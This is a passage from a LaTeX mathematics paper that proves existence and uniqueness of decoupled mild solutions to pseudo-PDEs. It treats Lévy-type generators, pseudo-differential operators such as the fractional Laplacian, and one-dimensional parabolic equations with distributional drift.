Moreover $(\mathbbm{P}^{s,x})_{(s,x)\in[0,T]\times\mathbbm{R}^d}$ defines a Markov class and its transition function is measurable in time.
\end{theorem}
The Martingale Problem associated to $(\mathcal{D}(a),a,V_t \equiv t)$
in the sense of Definition \ref{MartingaleProblem} is therefore well-posed and solved by $(\mathbbm{P}^{s,x})_{(s,x)\in[0,T]\times\mathbbm{R}^d}$.
In this context, $\mathcal{D}(a)$ is an algebra and for $\phi,\psi$ in $\mathcal{D}(a)$, the carr\'e du champs operator is given by
\begin{equation}
\Gamma(\phi,\psi) = \underset{i,j\leq d}{\sum}\alpha_{i,j}\partial_{x_i}\phi\partial_{x_j}\psi+\int_{\mathbbm{R}^d\backslash\{0\}}(\phi(\cdot,\cdot+y)-\phi)(\psi(\cdot,\cdot+y)-\psi)K(\cdot,\cdot,dy).\nonumber
\end{equation}
\\
In order to obtain a general result without having to make considerations on the integrability of $X$, we consider a couple $(f,g)$ satisfying $H^{lip}_b$
meaning that $g$ and $f(\cdot,\cdot,0,0)$ are bounded.
\begin{proposition}
Under the assumptions of Theorem \ref{Stroock}, and if $(f,g)$ verify $H^{lip}_b$ (see Hypothesis \ref{Hpq}), $Pseudo-PDE(f,g)$ admits a unique decoupled mild solution in the sense of Definition \ref{mildsoluv}.
\end{proposition}
\begin{proof}
$\mathcal{D}(a)$ is an algebra. Moreover $(\mathbbm{P}^{s,x})_{(s,x)\in[0,T]\times\mathbbm{R}^d}$ is a Markov class which is measurable in time, and it solves the well-posed Martingale Problem associated to $(\mathcal{D}(a),a,V_t\equiv t)$. Therefore our Theorem \ref{MainTheorem} applies.
\end{proof}
\subsection{Pseudo-Differential operators and Fractional Laplacian}\label{S4b}
This section concerns pseudo-differential operators with negative definite
symbol, see \cite{jacob2} for an extensive description. A typical example of such
operators will be the fractional Laplacian $\Delta^{\frac{\alpha}{2}}$ with $\alpha\in]0,2[$, see Chapter 3 in \cite{di2012hitchhikers} for a detailed study of this operator. We will mainly use the notations and vocabulary of N. Jacob in
\cite{jacob1}, \cite{jacob2} and \cite{jacob2005pseudo}, some results being attributed to W. Hoh \cite{hoh}. We fix $d\in\mathbbm{N}^*$.
$\mathcal{C}^{\infty}_c(\mathbbm{R}^d)$ will denote the space of real functions defined on
$\mathbbm{R}^d$ which are infinitely continuously differentiable
with compact support and $\mathcal{S}(\mathbbm{R}^d)$ the Schwartz space
of fast decreasing real smooth functions also defined on $\mathbbm{R}^d$.
$\mathcal{F}u$ will denote the Fourier transform of a function $u$ whenever it is well-defined. For $u\in L^1(\mathbbm{R}^d)$ we use the convention $\mathcal{F}u(\xi)=\frac{1}{(2\pi)^{\frac{d}{2}}}\int_{\mathbbm{R}^d} e^{-i(x,\xi)}u(x)dx$.
\begin{definition}
A function $\psi\in\mathcal{C}(\mathbbm{R}^d,\mathbbm{R})$
will be said
\textbf{negative definite} if for any $k\in\mathbbm{N}$, $\xi_1,\cdots,\xi_k\in\mathbbm{R}^d$, the matrix
$(\psi(\xi^j)+\psi(\xi^l)-\psi(\xi^j-\xi^l))_{j,l=1,\cdots,k}$ is symmetric positive definite.
\\
\\
A function $q\in\mathcal{C}(\mathbbm{R}^d\times \mathbbm{R}^d,\mathbbm{R})$ will be called a \textbf{continuous negative definite symbol} if for any $x\in\mathbbm{R}^d$, $q(x,\cdot)$ is continuous negative definite
\\
In this case we introduce
the pseudo-differential operator $q(\cdot,D)$ defined by
\begin{equation}
q(\cdot,D)(u)(x)=\frac{1}{(2\pi)^{\frac{d}{2}}}\int_{\mathbbm{R}^d} e^{i(x,\xi)}q(x,\xi)\mathcal{F}u(\xi)d\xi.
\end{equation}
\end{definition}
\begin{remark}
By Theorem 4.5.7 in \cite{jacob1},
$q(\cdot,D)$ maps the space
$\mathcal{C}^{\infty}_c(\mathbbm{R}^d)$
of smooth functions with compact support
into itself.
In particular $q(\cdot,D)$ will be defined on
$\mathcal{C}^{\infty}_c(\mathbbm{R}^d)$. However, the proof of this Theorem 4.5.7 only uses the fact that if $\phi\in\mathcal{C}^{\infty}_c(\mathbbm{R}^d)$ then $\mathcal{F}\phi\in\mathcal{S}(\mathbbm{R}^d)$ and this still holds for
every $\phi\in\mathcal{S}(\mathbbm{R}^d)$. Therefore $q(\cdot,D)$ is well-defined on $\mathcal{S}(\mathbbm{R}^d)$ and maps it into
$\mathcal{C}(\mathbbm{R}^d,\mathbbm{R})$.
\end{remark}
A typical example of such pseudo-differential operators is the fractional
Laplacian defined for some fixed $\alpha\in]0,2[$ on $\mathcal{S}(\mathbbm{R}^d)$ by
\begin{equation}
(-\Delta)^{\frac{\alpha}{2}}(u)(x)=\frac{1}{(2\pi)^{\frac{d}{2}}}
\int_{\mathbbm{R}^d} e^{i(x,\xi)}\|\xi\|^{\alpha}\mathcal{F}u(\xi)d\xi.
\end{equation}
Its symbol has no dependence in $x$ and is the continuous negative definite function $\xi\mapsto \|\xi\|^{\alpha}$.
Combining Theorem 4.5.12 and 4.6.6 in \cite{jacob2005pseudo}, one can state the following.
\begin{theorem}\label{ThmJacob1}
Let $\psi$ be a continuous negative definite function satisfying for some $r_0,c_0>0$: $\psi(\xi)\geq c_0\|\xi\|^{r_0}$ if $\|\xi\|\geq 1$. Let $M$ be the smallest integer strictly superior to $(\frac{d}{r_0}\vee 2)+d$. Let $q$ be a continuous negative symbol verifying, for some $c,c'>0$ and
$\gamma:\mathbbm{R}^d\rightarrow \mathbbm{R}^*_+$, the following items.
\begin{itemize}
\item $q(\cdot,0)=0$ and $\underset{x\in\mathbbm{R}^d}{\text{sup }}|q(x,\xi)|\underset{\xi\rightarrow 0}{\longrightarrow}0$;
\item $q$ is $\mathcal{C}^{2M+1-d}$ in the first variable and for any $\beta\in\mathbbm{N}^d$ with $\|\beta\|\leq 2M+1-d$, $\|\partial^{\beta}_x q\|\leq c(1+\psi)$;
\item $q(x,\xi)\geq \gamma(x)(1+\psi(x))$ if $x\in \mathbbm{R}^d$, $\|\xi\|\geq 1$;
\item $q(x,\xi)\leq c'(1+\|\xi\|^2)$ for every $(x,\xi)$.
\end{itemize}
Then the homogeneous Martingale Problem associated to $(-q(\cdot,D),\mathcal{S}(\mathbbm{R}^d))$ is well-posed (see Definition \ref{MPhomogene}) and its solution $(\mathbbm{P}^x)_{x\in\mathbbm{R}^d}$ defines a homogeneous Markov class, see Notation \ref{HomogeneNonHomogene}.
\end{theorem}
We will now introduce the time-inhomogeneous domain which will be used to extend $\mathcal{D}(-q(\cdot,D))=\mathcal{S}(\mathbbm{R}^d)$.
\begin{definition}\label{Ctopo}
Let $\tau$ be a Hausdorff topological linear space. We will denote by $\mathcal{C}^1([0,T],\tau)$ the set of
functions $\phi\in\mathcal{C}([0,T],\tau)$ such that there exists a function
$\partial_t\phi\in\mathcal{C}([0,T],\tau)$ verifying the following. For every $t_0 \in [0,T]$
we have $\frac{1}{(t - t_0)}(\phi(t)-\phi(t_0))\underset{t\rightarrow t_0}{\overset{\tau}{\longrightarrow}}\partial_t\phi(t_0)$.
\end{definition}
We recall that a topological algebra is a topological space equipped
with a structure of linear algebra
such that addition, multiplication and multiplication by a scalar are continuous.
\begin{lemma}\label{LemmaS1}
Let $\mathcal{A}$ be a (Hausdorff) topological algebra, then $\mathcal{C}^1([0,T],\mathcal{A})$ is a linear algebra, and for any $\phi,\psi\in\mathcal{C}^1([0,T],\mathcal{A})$, we have $\partial_t(\phi\psi)=\psi\partial_t\phi+\phi\partial_t\psi$.
\end{lemma}
\begin{proof}
The proof is very close to the one of $\mathbbm{R}$.
\end{proof}
\begin{remark}
Classical examples of topological algebras are
$\mathcal{C}_c^{\infty}(\mathbbm{R}^d)$,
$\mathcal{S}(\mathbbm{R}^d)$, $\mathcal{C}^{\infty}(\mathbbm{R}^d)$, $\mathcal{C}^{m}(\mathbbm{R}^d)$ for some $m\in\mathbbm{N}$ (equipped with their usual
topologies), or $W^{k,p}(\mathbbm{R}^d)\bigcap W^{k,\infty}(\mathbbm{R}^d)$ for any $k \in \mathbbm{N}^*, p \ge 1$, where $W^{k,p}(\mathbbm{R}^d)$ denotes the usual Sobolev space of parameters $k,p$. Those are all
Fr\'echet algebras except for $\mathcal{C}_c^{\infty}(\mathbbm{R}^d)$ which is only locally convex one.
\end{remark}
\begin{notation}\label{DefS1}
We set $\mathcal{D}(\partial_t-q(\cdot,D)):=\mathcal{C}^1([0,T],\mathcal{S}(\mathbbm{R}^d))$.
\end{notation}
Elements in $\mathcal{C}([0,T],\mathcal{S}(\mathbbm{R}^d))$ will also be seen as functions of two variables, and since convergence in $\mathcal{S}(\mathbbm{R}^d)$ implies pointwise convergence, the usual notion of partial derivative coincides with the notation $\partial_t$ introduced in Definition \ref{Ctopo}. Any $\phi\in\mathcal{D}(\partial_t-q(\cdot,D))$ clearly verifies
\begin{itemize}
\item $\forall t\in[0,T]$, $\phi(t,\cdot)\in\mathcal{S}(\mathbbm{R}^d)$ and $\forall x\in\mathbbm{R}^d$, $\phi(\cdot,x)\in\mathcal{C}^1([0,T],\mathbbm{R})$;
\item $\forall t\in[0,T]$, $\partial_t\phi(t,\cdot)\in\mathcal{S}(\mathbbm{R}^d)$.
\end{itemize}
Our goal now is to show that $\mathcal{D}(\partial_t-q(\cdot,D)$ also verifies the other items needed to be included in $\mathcal{D}^{max}(\partial_t-q(\cdot,D))$ (see Notation \ref{NotDomain}) and therefore that Corollary \ref{conclusionA4} applies with this domain.
\begin{notation}
Let $\alpha,\beta\in\mathbbm{N}^d$ be multi-indexes, we introduce the semi-norm
\begin{equation}
\|\cdot\|_{\alpha,\beta}:
\begin{array}{rcl}
\mathcal{S}(\mathbbm{R}^d)&\longrightarrow &\mathbbm{R}\\
\phi&\longmapsto &\underset{x\in\mathbbm{R}^d}{\text{sup }}|x^{\alpha}\partial_x^{\beta}\phi(x)|.
\end{array}
\end{equation}
\end{notation}
$\mathcal{S}(\mathbbm{R}^d)$ is a Fr\'echet space whose topology is determined
by the family of seminorms $ \|\cdot\|_{\alpha,\beta}$.
In particular those seminorms are continuous.
\\
In what follows, $\mathcal{F}_x$ will denote the Fourier transform taken in the space variable.
\begin{proposition}\label{PropS0}
Let $\phi\in\mathcal{C}([0,T],\mathcal{S}(\mathbbm{R}^d))$.
Then $\mathcal{F}_x\phi\in\mathcal{C}([0,T],\mathcal{S}(\mathbbm{R}^d))$. Moreover if $\phi\in\mathcal{C}^1([0,T],\mathcal{S}(\mathbbm{R}^d))$, then $\mathcal{F}_x\phi\in\mathcal{C}^1([0,T],\mathcal{S}(\mathbbm{R}^d))$ and
\\
$\partial_t\mathcal{F}_x\phi=\mathcal{F}_x\partial_t\phi$.
\end{proposition}
\begin{proof}
$\mathcal{F}_x:\mathcal{S}(\mathbbm{R}^d)\longrightarrow \mathcal{S}(\mathbbm{R}^d)$ is continuous, so $\phi\in\mathcal{C}([0,T],\mathcal{S}(\mathbbm{R}^d)$ implies $\mathcal{F}_x\phi\in\mathcal{C}([0,T],\mathcal{S}(\mathbbm{R}^d))$. If $\phi\in\mathcal{C}^1([0,T],\mathcal{S}(\mathbbm{R}^d))$ then $\partial_t\phi\in\mathcal{C}([0,T],\mathcal{S}(\mathbbm{R}^d)$ so $\mathcal{F}_x\partial_t\phi\in\mathcal{C}([0,T],\mathcal{S}(\mathbbm{R}^d)$. Then for any $t_0\in[0,T]$, the convergence
\\
$\frac{1}{t-t_0}(\phi(t,\cdot)-\phi(t_0,\cdot))\underset{t\rightarrow t_0}{\overset{\mathcal{S}(\mathbbm{R}^d)}{\longrightarrow}}\partial_t\phi(t_0,\cdot)$ is preserved by the continuous mapping $\mathcal{F}_x$ meaning that (by linearity)
\\
$\frac{1}{t-t_0}(\mathcal{F}_x\phi(t,\cdot)-\mathcal{F}_x\phi(t_0,\cdot))\underset{t\rightarrow t_0}{\overset{\mathcal{S}(\mathbbm{R}^d)}{\longrightarrow}}\mathcal{F}_x\partial_t\phi(t_0,\cdot)$. Since $\mathcal{F}_x\partial_t\phi\in\mathcal{C}([0,T],\mathcal{S}(\mathbbm{R}^d))$, we have shown that $\mathcal{F}_x\phi\in\mathcal{C}^1([0,T],\mathcal{S}(\mathbbm{R}^d))$ and $\partial_t\mathcal{F}_x\phi=\mathcal{F}_x\partial_t\phi$.
\end{proof}
\begin{proposition}\label{PropS1}
If $\phi\in\mathcal{C}([0,T],\mathcal{S}(\mathbbm{R}^d))$, then for any $\alpha,\beta\in\mathbbm{N}^d$,
\\
$(t,x)\longmapsto x^{\alpha}\partial_x^{\beta}\phi(t,x)$
is bounded.
\end{proposition}
\begin{proof}
Let $\alpha,\beta$ be fixed. Since the maps
$\|\cdot\|_{\alpha,\beta}:\mathcal{S}(\mathbbm{R}^d)\rightarrow\mathbbm{R}$ are
continuous, for every $\phi\in\mathcal{C}([0,T],\mathcal{S}(\mathbbm{R}^d))$,
the application $t\mapsto \|\phi(t,\cdot)\|_{\alpha,\beta}$ is continuous on
the compact interval $[0,T]$ and therefore bounded,
which yields the result.
\end{proof}
\begin{proposition}\label{PropS2}
If $\phi\in\mathcal{C}([0,T],\mathcal{S}(\mathbbm{R}^d))$ and $\alpha,\beta\in\mathbbm{N}^d$, then
there exist non-negative functions $\psi_{\alpha,\beta}\in L^1(\mathbbm{R}^d)$ such that
for every $(t,x)\in [0,T]\times \mathbbm{R}^d$, $|x^{\alpha}\partial_x^{\beta}\phi(t,x)|\leq
\psi_{\alpha,\beta}(x)$.
\end{proposition}
\begin{proof}
We decompose
\begin{equation}
\begin{array}{rcl}
|x^{\alpha}\partial_x^{\beta}\phi(t,x)| &=& |x^{\alpha}\partial_x^{\beta}\phi(t,x)|\mathds{1}_{[-1,1]^d}(x)+|x^{\alpha+(2,\cdots,2)}\partial_x^{\beta}\phi(t,x)|\frac{1}{\underset{i\leq d}{\Pi}x_i^2}\mathds{1}_{\mathbbm{R}^d\backslash[-1,1]^d}(x)\\
&\leq& C(\mathds{1}_{[-1,1]^d}(x)+\frac{1}{\underset{i\leq d}{\Pi}x_i^2}\mathds{1}_{\mathbbm{R}^d\backslash[-1,1]^d}(x)),
\end{array}
\end{equation}
where $C$ is some constant which exists thanks to Proposition \ref{PropS1}.
\end{proof}
\begin{proposition}\label{PropS3}
Let $q$ be a continuous negative definite symbol verifying the assumptions of Theorem \ref{ThmJacob1} and let $\phi\in\mathcal{C}^1([0,T],\mathcal{S}(\mathbbm{R}^d))$. Then for any $x\in\mathbbm{R}^d$,
$t\mapsto q(\cdot,D)\phi(t,x)\in\mathcal{C}^1([0,T],\mathbbm{R})$ and $\partial_tq(\cdot,D)\phi=q(\cdot,D)\partial_t\phi$.
\end{proposition}
\begin{proof}
We fix $\phi\in\mathcal{C}^1([0,T],\mathcal{S}(\mathbbm{R}^d))$, and $x\in\mathbbm{R}^d$. We wish to show that for any $\xi\in\mathbbm{R}^d$, $t\longmapsto \frac{1}{(2\pi)^{\frac{d}{2}}}\int_{\mathbbm{R}^d} e^{i(x,\xi)}q(x,\xi)\mathcal{F}_x\phi(t,\xi)d\xi$ is $\mathcal{C}^1$ with derivative
\\
$t\longmapsto \frac{1}{(2\pi)^{\frac{d}{2}}}\int_{\mathbbm{R}^d} e^{i(x,\xi)}q(x,\xi)\mathcal{F}_x\partial_t\phi(t,\xi)d\xi$.
\\
Since $\phi\in\mathcal{C}^1([0,T],\mathcal{S}(\mathbbm{R}^d))$, then $\partial_t\phi\in\mathcal{C}([0,T],\mathcal{S}(\mathbbm{R}^d))$ and by Proposition \ref{PropS0}, $\mathcal{F}_x\partial_t\phi\in\mathcal{C}([0,T],\mathcal{S}(\mathbbm{R}^d))$.
Moreover since $q$ verifies the assumptions of Theorem \ref{ThmJacob1}, then $|q(x,\xi)|$ is bounded by $c'(1+\|\xi\|^2)$ for some constant $c'$.
Therefore by Proposition \ref{PropS2}, there exists a non-negative $\psi\in L^1(\mathbbm{R}^d)$ such that for every $t,\xi$, $|q(x,\xi)\mathcal{F}_x\partial_t\phi(t,\xi)|\leq \psi(\xi)$. Since by Proposition \ref{PropS0}, $\mathcal{F}_x\partial_t\phi=\partial_t\mathcal{F}_x\phi$, this implies that for any $(t,\xi)$, $|\partial_te^{i(x,\xi)}q(x,\xi)\mathcal{F}_x\phi(t,\xi)|\leq \psi(\xi)$. So by the
theorem about the differentiation of integrals depending on a parameter,
for any $\xi\in\mathbbm{R}^d$, $t\longmapsto \frac{1}{(2\pi)^{\frac{d}{2}}}\int_{\mathbbm{R}^d} e^{i(x,\xi)}q(x,\xi)\mathcal{F}_x\phi(t,\xi)d\xi$ is of class
$\mathcal{C}^1$ with derivative $t\longmapsto \frac{1}{(2\pi)^{\frac{d}{2}}}\int_{\mathbbm{R}^d} e^{i(x,\xi)}q(x,\xi)\mathcal{F}_x\partial_t\phi(t,\xi)d\xi$.
\end{proof}
\begin{proposition}\label{PropS4}
Let $q$ be a continuous negative definite symbol verifying the assumptions of Theorem \ref{ThmJacob1} and let $\phi\in\mathcal{C}^1([0,T],\mathcal{S}(\mathbbm{R}^d))$. Then $\phi$, $\partial_t\phi$, $q(\cdot,D)\phi$ and $q(\cdot,D)\partial_t\phi$ are bounded.
\end{proposition}
\begin{proof}
Proposition \ref{PropS1} implies that any element of $\mathcal{C}([0,T],\mathcal{S}(\mathbbm{R}^d))$ is bounded, so we immediately deduce that $\phi$ and $\partial_t\phi$ are bounded.
\\
Since $q$ verifies the assumptions of Theorem \ref{ThmJacob1},
for any fixed $(t,x)\in[0,T]\times \mathbbm{R}^d$, we have
\begin{equation}
\begin{array}{rcl}
|q(\cdot,D)\phi(t,x)|&=& \left|\frac{1}{(2\pi)^{\frac{d}{2}}}\int_{\mathbbm{R}^d} e^{i(x,\xi)}q(x,\xi)\mathcal{F}_x\phi(t,\xi)d\xi\right|\\
&\leq& C\int_{\mathbbm{R}^d}(1+\|\xi\|^2)|\mathcal{F}_x\phi(t,\xi)|d\xi,
\end{array}
\end{equation}
for some constant $C$.
Since $\phi\in\mathcal{C}([0,T],\mathcal{S}(\mathbbm{R}^d))$ then,
by Proposition \ref{PropS0},
$\mathcal{F}_x\phi$ also belongs to
$\mathcal{C}([0,T],\mathcal{S}(\mathbbm{R}^d))$, and by Proposition \ref{PropS1}, there exists a positive $\psi\in L^1(\mathbbm{R}^d)$ such that for any $(t,\xi)$, $(1+\|\xi\|^2)|\mathcal{F}_x\phi(t,\xi)|\leq \psi(\xi)$, so for any $(t,x)$, $|q(\cdot,D)\phi(t,x)|\leq \|\psi\|_1$.
\\
\\
Similar arguments hold replacing $\phi$ with $\partial_t\phi$ since it also belongs to $\mathcal{C}([0,T],\mathcal{S}(\mathbbm{R}^d))$.
\end{proof}
\begin{remark} \label{RSobolev}
$\mathcal{C}^1([0,T],\mathcal{S}(\mathbbm{R}^d))$ seems
to be a domain which is particularly appropriate for time-dependent Fourier
analysis and it fits well for our framework.
On the other hand it is not so fundamental to require such regularity
for classical solutions for Pseudo-PDEs, so that we could
consider a larger domain. For example
the Fr\'echet algebra $\mathcal{S}(\mathbbm{R}^d)$ could be replaced
with the Banach algebra $W^{d+3,1}(\mathbbm{R}^d)\bigcap W^{d+3,\infty}(\mathbbm{R}^d)$
in all the previous proofs.
\\
Even bigger domains are certainly possible, we will however not
insist on such refinements.
\end{remark}
\begin{corollary}\label{CoroS1}
Let $q$ be a continuous negative definite symbol verifying the hypotheses of Theorem \ref{ThmJacob1}. Then
$\mathcal{D}(\partial_t-q(\cdot,D))$
is a linear algebra included in $\mathcal{D}^{max}(\partial_t-q(\cdot,D))$ as defined in Notation \ref{NotDomain}.
\end{corollary}
\begin{proof}
We recall that, according to Notation \ref{DefS1}
$\mathcal{D}(\partial_t-q(\cdot,D))
=\mathcal{C}^1([0,T],\mathcal{S}(\mathbbm{R}^d))$.
The proof follows from Lemma \ref{LemmaS1}, Propositions \ref{PropS3} and \ref{PropS4}, and the comments under Notation \ref{DefS1}.
\end{proof}
\begin{corollary}\label{CoroJacob}
Let $q$ be a continuous negative definite symbol verifying the hypotheses of Theorem \ref{ThmJacob1}, let $(\mathbbm{P}^x)_{x\in\mathbbm{R}^d}$ be the corresponding homogeneous Markov class exhibited in Theorem \ref{ThmJacob1}, let $(\mathbbm{P}^{s,x})_{(s,x)\in[0,T]\times \mathbbm{R}^d}$ be the corresponding Markov class (see Notation \ref{HomogeneNonHomogene}), let $(\mathcal{D}(\partial_t-q(\cdot,D)),\partial_t-q(\cdot,D))$ be as in Notation \ref{DefS1}.
Then
\begin{itemize}
\item $(\mathbbm{P}^{s,x})_{(s,x)\in[0,T]\times \mathbbm{R}^d}$ solves the well-posed Martingale Problem associated to $(\mathcal{D}(\partial_t-q(\cdot,D)),\partial_t-q(\cdot,D),V_t\equiv t)$;
\item its transition function is measurable in time.
\end{itemize}
\end{corollary}
\begin{proof}
The first statement directly comes from Theorem \ref{ThmJacob1} and Corollaries \ref{CoroS1} \ref{conclusionA4}, and the second from Proposition \ref{HomoMeasurableint}.
\end{proof}
\begin{remark}
The symbol of the fractional Laplacian $q:(x,\xi)\mapsto\|\xi\|^{\alpha}$ trivially verifies the assumptions of Theorem \ref{ThmJacob1}. Indeed, it has no dependence in $x$, so it is enough to set $\psi:\xi\mapsto \|\xi\|^{\alpha}$, $c_0=c=c'=1$, $r_0=\alpha$ and $\gamma=\frac{1}{2}$.
\end{remark}
The Pseudo-PDE that we focus on is the following.
\begin{equation}\label{PDEsymbol}
\left\{
\begin{array}{rcl}
\partial_tu-q(\cdot,D)u = f(\cdot,\cdot,u,\sqrt{\Gamma(u,u)}) \,\text{on }[0,T]\times\mathbbm{R}^d\\
u(T,\cdot)=g,
\end{array}\right.
\end{equation}
where $q$ is a continuous negative definite symbol verifying the assumptions of Theorem \ref{ThmJacob1} and $\Gamma$ is the associated carr\'e du champs operator, see Definition \ref{SFO}.
\begin{remark} \label{R418}
By Proposition 3.3 in \cite{di2012hitchhikers}, for any $\alpha\in]0,2[$, there exists a constant $c_{\alpha}$ such that for any $\phi\in\mathcal{S}(\mathbbm{R}^d)$,
\begin{equation}\label{FracLap}
(-\Delta)^{\frac{\alpha}{2}}\phi = c_{\alpha}PV\int_{\mathbbm{R}^d} \frac{(\phi(\cdot+y)-\phi)}{\| y\|^{d+\alpha}}dy,
\end{equation}
where $PV$ is a notation for principal value, see (3.1) in \cite{di2012hitchhikers}. Therefore in the particular case of the fractional Laplace operator, the carr\'e du champs operator $\Gamma^{\alpha}$ associated to $(-\Delta)^{\frac{\alpha}{2}}$ is given by
\begin{equation}
\begin{array}{rcl}
&&\Gamma^{\alpha}(\phi,\phi)\\
&=& c_{\alpha}PV\int_{\mathbbm{R}^d} \frac{(\phi^2(\cdot,\cdot+y)-\phi^2)}{\| y\|^{d+\alpha}}dy-2\phi c_{\alpha}PV\int_{\mathbbm{R}^d} \frac{(\phi(\cdot,\cdot+y)-\phi)}{\| y\|^{d+\alpha}}dy\\
&=&c_{\alpha}PV\int_{\mathbbm{R}^d} \frac{(\phi(\cdot,\cdot+y)-\phi)^2}{\| y\|^{d+\alpha}}dy.
\end{array}
\end{equation}
\end{remark}
\begin{proposition}
Let $q$ be a continuous negative symbol verifying the assumptions of Theorem \ref{ThmJacob1}, let $(\mathbbm{P}^{s,x})_{(s,x)\in[0,T]\times \mathbbm{R}^d}$ be the Markov class which by Corollary \ref{CoroJacob} solves the well-posed Martingale Problem associated to
\\
$(\mathcal{D}(\partial_t-q(\cdot,D)),\partial_t-q(\cdot,D),V_t \equiv t)$.
\\
For any $(f,g)$ verifying $H^{lip}_b$ (see Hypothesis \ref{Hpq}), $Pseudo-PDE(f,g)$ admits a unique decoupled mild solution in the sense of Definition \ref{mildsoluv}.
\end{proposition}
\begin{proof}
The assertion comes from Corollary \ref{CoroJacob} and Theorem \ref{MainTheorem}.
\end{proof}
\subsection{Parabolic semi-linear PDEs with distributional drift}\label{S4c}
In this section we will use the formalism and results obtained
in \cite{frw1} and \cite{frw2}, see also \cite{trutnau}, \cite{diel}
for more recent developments. In particular the latter
paper treats interesting applications to polymers.
Those papers introduced a suitable framework of
Martingale Problem related to a PDE operator
containing a distributional drift $b'$ which is the
derivative of a continuous function.
\cite{issoglio} established a first work in the $n$-dimensional setting.
Let $b,\sigma\in \mathcal{C}^0(\mathbbm{R})$ such that $\sigma>0$.
By mollifier, we intend a function $\Phi\in\mathcal{S}(\mathbbm{R})$ with $\int \Phi(x)dx=1$.
We denote $\Phi_n(x)=n\Phi(nx)$, $\sigma^2_n = \sigma^2\ast \Phi_n$, $b_n=b\ast \Phi_n$.
\\
We then define $L_ng=\frac{\sigma^2_n}{2}g''+b_n'g'$.
$f\in\mathcal{C}^1(\mathbbm{R})$ is said to be a solution to $Lf =\dot{l}$ where $\dot{l}\in\mathcal{C}^0$, if for any mollifier $\Phi$, there are sequences $(f_n)$ in $\mathcal{C}^2$, $(\dot{l}_n)$ in $\mathcal{C}^0$ such that $L_nf_n=(\dot{l}_n)\text{, }f_n\overset{\mathcal{C}^1}{\longrightarrow}f\text{, }\dot{l}_n\overset{\mathcal{C}^0}{\longrightarrow}\dot{l}$.
We will assume that
$\Sigma(x) =\underset{n\rightarrow\infty}{\text{lim }}2\int_0^x\frac{b'_n}{\sigma^2_n}(y)dy$
exists in $\mathcal{C}^0$ independently from the mollifier.
\\
\\
By Proposition 2.3 in \cite{frw1} there exists a solution $h\in\mathcal{C}^1$ to $Lh=0\text{, }h(0)=0\text{, }h'(0)=1$.
Moreover it verifies $h'=e^{-\Sigma}$. Moreover by Remark 2.4 in
\cite{frw1},
for any $\dot{l}\in\mathcal{C}^0$, $x_0,x_1\in\mathbbm{R}$,
there exists a unique solution of
\begin{equation}
Lf(x)=\dot{l}\text{, }f\in\mathcal{C}^1\text{, }f(0)=x_0\text{, }f'(0)=x_1.
\end{equation}
$\mathcal{D}_L$ is defined as the set of $f\in\mathcal{C}^1$ such that there exists some $\dot{l}\in\mathcal{C}^0$ with $Lf=\dot{l}$. And by Lemma 2.9 in \cite{frw1} it is equal to the set of $f\in\mathcal{C}^1$ such that $\frac{f'}{h'}\in\mathcal{C}^1$. So it is clearly an algebra.
\\
$h$ is strictly increasing, $I$ will denote its image. Let $L^0$ be the classical differential operator defined by $L^0\phi=\frac{\sigma^2_0}{2}\phi''$,
where
\begin{equation}
\sigma_0(y)=\left\{
\begin{array}{rcl}
(\sigma h')(h^{-1}(y)) & : & y\in I\\
0 & : & y\in I^c.
\end{array}\right.
\end{equation}
\\
Let $v$ be the unique solution to $Lv=1\text{, }v(0)=v'(0)=0$, we will assume that
\begin{equation}\label{NonExplosion}
v(-\infty)=v(+\infty)=+\infty,
\end{equation}
which represents a non-explosion condition.
In this case, Proposition 3.13 in \cite{frw1} states that the Martingale
Problem associated to
$(\mathcal{D}_L,L,V_t\equiv t)$ is well-posed. Its solution will be denoted $(\mathbbm{P}^{s,x})_{(s,x)\in[0,T]\times\mathbbm{R}^d}$.
By Proposition 2.13, $\mathcal{D}_{L^0} = C^2(I)$.
and by Proposition 3.2 in \cite{frw1}, the Martingale Problem associated to
$(\mathcal{D}_{L^0},L^0,V_t\equiv t)$
is also well-posed, we will call $(\mathbbm{Q}^{s,x})_{(s,x)\in[0,T]\times\mathbbm{R}^d}$ its solution. Moreover under any $\mathbbm{P}^{s,x}$ the canonical process is a Dirichlet process, and $h^{-1}(X)$ is a semi-martingale that we call $Y$
solving the SDE $Y_t=h(x)+\int_s^t\sigma_0(Y_s)dW_s$ in law, where the law of $Y$ is $\mathbbm{Q}^{s,x}$. $X_t$ is a $\mathbbm{P}^{s,x}$-Dirichlet process
whose martingale component is $\int_s^{\cdot}\sigma(X_r)dW_r$.
$(\mathbbm{P}^{s,x})_{(s,x)\in[0,T]\times\mathbbm{R}^d}$ and $(\mathbbm{Q}^{s,x})_{(s,x)\in[0,T]\times\mathbbm{R}^d}$ both define Markov classes.
\\
We introduce now the domain that we will indeed use.
\begin{definition}\label{domain}
We set
\begin{equation}
\mathcal{D}(a)=\left\{
\phi\in\mathcal{C}^{1,1}([0,T]\times\mathbbm{R}):\frac{\partial_x\phi}{h'}\in\mathcal{C}^{1,1}([0,T]\times\mathbbm{R})\right\},
\end{equation}
which clearly is a linear algebra.
\\
On $\mathcal{D}(a)$, we set $L\phi:=\frac{\sigma^2h'}{2}\partial_x(\frac{\partial_x\phi}{h'})$ and $a(\phi):=\partial_t\phi+L\phi$.
\end{definition}
\begin{proposition}
Let $\Gamma$ denote the carré du champ operator associated to $a$, let $\phi,\psi$ be in $\mathcal{D}(a)$, then $\Gamma(\phi,\psi)=\sigma^2\partial_x\phi\partial_x\psi$.
\end{proposition}
\begin{proof}
We fix $\phi,\psi$ in $\mathcal{D}(a)$. We write
\begin{equation}
\begin{array}{rcl}
\Gamma(\phi,\psi)&=& (\partial_t+L)(\phi\psi)-\phi(\partial_t+L)(\psi)-\psi(\partial_t+L)(\phi)\\
&=& \frac{\sigma^2h'}{2}\left(\partial_x\left(\frac{\partial_x\phi\psi}{h'}\right)-\phi\partial_x\left(\frac{\partial_x\psi}{h'}\right)-\psi\partial_x\left(\frac{\partial_x\phi}{h'}\right)\right)\\
&=& \sigma^2\partial_x\phi\partial_x\psi.
\end{array}
\end{equation}
\end{proof}
Emphasizing that $b'$ is a distribution,
the equation that we will study in this section is therefore given by
\begin{equation}\label{PDEdistri}
\left\{
\begin{array}{l}
\partial_tu + \frac{1}{2}\sigma^2\partial^2_x u + b'\partial_xu +f(\cdot,\cdot,u,\sigma|\partial_xu|)=0\quad\text{ on }[0,T]\times\mathbbm{R}\\
u(T,\cdot) = g.
\end{array}\right.
\end{equation}
\begin{proposition}\label{MPnewdomaindistri}
